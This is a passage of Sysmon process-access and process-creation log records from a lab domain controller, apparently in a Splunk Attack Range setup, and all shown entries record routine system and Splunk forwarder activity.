C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010918A1100}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010918A1100}","TargetProcessId":"4808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.653\r\nSourceProcessGUID: {A837DB8D-04DA-5F25-0000-0010918A1100}\r\nSourceProcessId: 4808\r\nSourceThreadId: 656\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.653","SourceProcessGUID":"{A837DB8D-04DA-5F25-0000-0010918A1100}","SourceProcessId":"4808","SourceThreadId":"656","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nProcessGuid: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nProcessId: 2756\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","ProcessGuid":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","TargetProcessId":"2756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","TargetProcessId":"2756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
